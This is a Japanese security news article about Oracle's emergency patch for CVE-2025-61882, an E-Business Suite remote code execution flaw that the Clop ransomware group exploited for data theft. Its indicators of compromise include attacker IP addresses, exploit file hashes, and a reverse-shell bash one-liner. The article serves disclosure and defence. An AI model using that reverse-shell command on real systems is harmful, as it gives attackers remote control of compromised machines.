概要
Oracleは、E-Business Suite(EBS)の深刻なゼロデイ脆弱性「CVE-2025-61882」に対する緊急パッチを公開しました。この脆弱性は、認証なしでリモートコード実行を可能にするもので、悪名高いClopランサムウェアグループによるデータ窃盗攻撃で既に悪用されていたことが確認されています。
脆弱性の詳細
この脆弱性は、Oracle E-Business SuiteのOracle Concurrent Processing製品(コンポーネント:BI Publisher Integration)内に存在します。CVSSスコアは9.8と極めて高く、認証不要で容易に悪用できるため、深刻な脅威となります。Oracleの勧告によると、この脆弱性が悪用された場合、認証なしでリモートコード実行が可能となり、システムが完全に侵害される恐れがあります。影響を受けるバージョンは、Oracle E-Business Suite 12.2.3から12.2.14です。
Clopの攻撃と過去の事例
Clopランサムウェアグループは、2025年8月に発生した複数の企業に対するデータ窃盗攻撃で、このゼロデイ脆弱性を悪用しました。MandiantのCTOであるCharles Carmakal氏も、この事実を認めています。Clopは、Oracle EBSシステムから大量のデータを盗み出し、身代金を要求する脅迫メールを送付していました。
Clopはこれまでにも、数々のゼロデイ脆弱性を悪用して大規模なデータ窃盗攻撃を仕掛けてきた実績があります。
- 2020年: Accellion FTAプラットフォームのゼロデイを悪用し、約100組織に影響。
- 2021年: SolarWinds Serv-U FTPソフトウェアのゼロデイを悪用。
- 2023年: GoAnywhere MFTプラットフォームのゼロデイを悪用し、100社以上が侵害。
- 2023年: MOVEit Transferのゼロデイを悪用し、世界中の2,773組織からデータ窃盗。
- 2024年: Cleoファイル転送の2つのゼロデイ(CVE-2024-50623およびCVE-2024-55956)を悪用。
エクスプロイトの流出とIOC
このゼロデイ脆弱性のエクスプロイトは、「Scattered Lapsus$ Hunters」と名乗る脅威アクターグループによってTelegram上で公開されました。Oracleは、このエクスプロイトがClopによって使用されたことを確認しており、以下の侵害の痕跡(IOC)を共有しています。
- IPアドレス: 200.107.207.26, 185.181.60.11 (HTTP GETおよびPOSTリクエストに関連)
- 実行コマンド:
sh -c /bin/bash -i >& /dev/tcp// 0>&1(リバースシェルを開くためのコマンド) - エクスプロイトアーカイブのSHA256ハッシュ:
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d(oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip) - エクスプロイトファイル(一部)のSHA256ハッシュ:
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121(exp.py),6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b(server.py)
Oracleの対応
Oracleは、この脆弱性に対処するための緊急アップデートをリリースしました。顧客は、この新しいセキュリティアップデートをインストールする前に、2023年10月のCritical Patch Updateを適用している必要があると警告しています。
結論
Oracle EBSを利用している組織は、直ちにシステムを評価し、提供されたパッチを適用することが極めて重要です。Clopのような高度な脅威アクターによるゼロデイ攻撃は、迅速な対応が求められる深刻なリスクをもたらします。